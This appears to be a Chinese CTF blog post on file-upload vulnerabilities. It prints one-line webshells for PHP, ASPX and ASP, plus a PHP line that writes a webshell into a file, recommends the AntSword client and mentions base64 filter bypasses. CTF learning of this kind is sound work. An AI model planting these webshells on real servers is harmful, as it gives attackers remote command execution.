目录

简介

一句话木马

蚁剑

例题

总结思路

附言

简介

文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。

一句话木马

首先通过看一些题解和博客,发现一句话木马要根据语言的不同来考虑如何构建。比如

php:

<?php @eval($_POST[value]);?>

<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中

(这里再转一个更多方式的一句话木马构造方式)

PHP一句话木马之小马 - 简书

aspx(asp.net):

<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

asp:

<%execute(request(“v”))%>

蚁剑

当然这里就不得不提到蚁剑和菜刀,我使用的是蚁剑(当前中国菜刀已停止更新,最新版也有bug),那就以蚁剑为例。

安装教程:中国蚁剑安装教程_rab3it的博客-CSDN博客_中国蚁剑

例题

在这里以攻防世界的webshell为例

很明显的一句话木马eval为执行括号中指令。而shell在我的理解中和sql的注入点差不多,可以通过改变shell的值来构造一些代码并执行。也就是说可以将shell视为后门。

蚁剑中的连接密码应该就是指这个后门的值,而蚁剑能通过改变这个值来对服务器进行管理。

 

登入后即可看到flag

总结思路

1.构造一句话木马

2. 注意过滤和防护,必要时使用文件,base64等知识绕过

3.使用万能的蚁剑。

附言

文件上传的题还得多刷寄道,然后做个集合。还是那句话吧,希望自己不要鸽了吧。

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2

ctf文件上传基本思路+例题相关推荐

  1. i春秋-ctf 文件上传

    文章目录 前言 一.题目 二.解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答.通过 ...

  2. 【网络安全】文件上传绕过思路总结

    硬怼 [技术资料] 硬怼的话,主要是从下面这些方法入手去操作. (1)fuzz后缀名 看看有无漏网之鱼(针对开发自定义的过滤可能有机会,针对waf基本不可能.更多的情况是php的站寻找文件包含或者解析 ...

  3. 中国菜刀使用教程--ctf 文件上传

    首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script ...

  4. Python攻克之路-网络编程(文件上传实现思路)

    需求:一个server,一个client,实现client把某个文件传到server中某个目录中 分析:实际是实现数据传输,设定一个命令和一个参数(上传的内容),连接后,让用户输入命令和要传送的内容, ...

  5. Rop 文件上传解决思路

    由于服务请求报文是一个文本,无法直接传送二进制的文件内容,因此必须采用某种 转换机制将二进制的文件内容转换为字符串.Rop 采用如下的方式对上传文件进行编码: <fileType>@< ...

  6. CTF 总结01:文件上传绕过

    问题描述 (⌐■_■)在做图片马上传的题目,发现自己折腾很久,终于成功达到了抽刀断水.南辕北辙的效果~距离正确的WP仅有一部西游记那么长-- 没关系,菜鸟做题就是这样屡败屡战~失败是成功的山顶洞人,也 ...

  7. 渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞

    漏洞数据库:https://www.exploit-db.com/google-hacking-database 1.渗透测试 实用 浏览器插件 chrome.edge 插件:搜索 cookie,安装 ...

  8. vue 文件及描述信息一起上传_用Vue实现一个大文件上传和断点续传

    前言 这段时间面试官都挺忙的,频频出现在博客文章标题,虽然我不是特别想蹭热度,但是实在想不到好的标题了-.-,蹭蹭就蹭蹭 :) 事实上我在面试的时候确实被问到了这个问题,而且是一道在线 coding ...

  9. SpringBoot 文件上传 通过Content-Type和文件头判断文件类型

    SpringBoot 文件上传 通过Content-Type和文件头判断文件类型 一.关于MIME MIME的全称是Multipurpose Internet Mail Extensions,即多用途 ...

最新文章

  1. linux_OEL5.4_安装Oracle11g中文教程图解
  2. Eclipse设置字体
  3. AS3中 is,as,typeof的区别 .
  4. java并发编程核心方法与框架_Java并发编程核心方法与框架-Future和Callable的使用...
  5. shared_ptr的一些尴尬
  6. C++指针探讨 (二) 函数指针
  7. struts2上传图片到mysql数据库 实例_Struts2上传图片到Mysql数据库中,以及显示到页面...
  8. date类型_Chapter 01. 常见数据类型概述 Overview of Common Data Types
  9. 服务器linux命令aux,Linux查看所有进程ps -aux命令介绍
  10. 电销机器人源码+图文介绍
  11. 谷歌离线地图开源地图服务器
  12. edem颗粒替换_EDEM离散元软件中颗粒替换与填充编程模版
  13. 【圆梦名企第三季】4月12日软件业“人才留湘 引才入湘”专项行动
  14. 动态数据的表格页面展示
  15. 网站打开速度与服务器的关系,网站打开速度慢对SEO的影响
  16. RAKE(快速自动关键字抽取)算法原理与实现
  17. 计算机电池维修方案,解决方案:计算机主板电池已耗尽,如果不更换电池该怎么办?如何更换电池...
  18. IntelliJ IDEA的安装及插件下载
  19. 转区系统开放艾欧尼亚转入服务器,LOL转区系统申请客户端及操作流程介绍
  20. 利用Matlab判断某些点是否在多边形区域内

热门文章

  1. 关于并发和并行,Go和Erlang之父都弄错了?
  2. 医院计算机中心应急演练,我院开展信息系统故障应急演练
  3. 什么是量化交易?量化机器人有什么用?
  4. DSCTF2022 fuzzerinstrospector-Wp
  5. SpringBoot天天吃货商品项目
  6. 复制文本功能兼容 微信ios 火狐浏览器
  7. 这是一个用notepad++和masm5.0搭建的汇编环境
  8. SSM《程序设计基础》课程答疑系统的设计与实现 毕业设计-附源码261620
  9. DAEMKL:基于多核学习的深度自动编码器预测miRNA与疾病的关联(IEEE Transactions on Neural Networks and Learning Systems)
  10. bandicam屏幕录制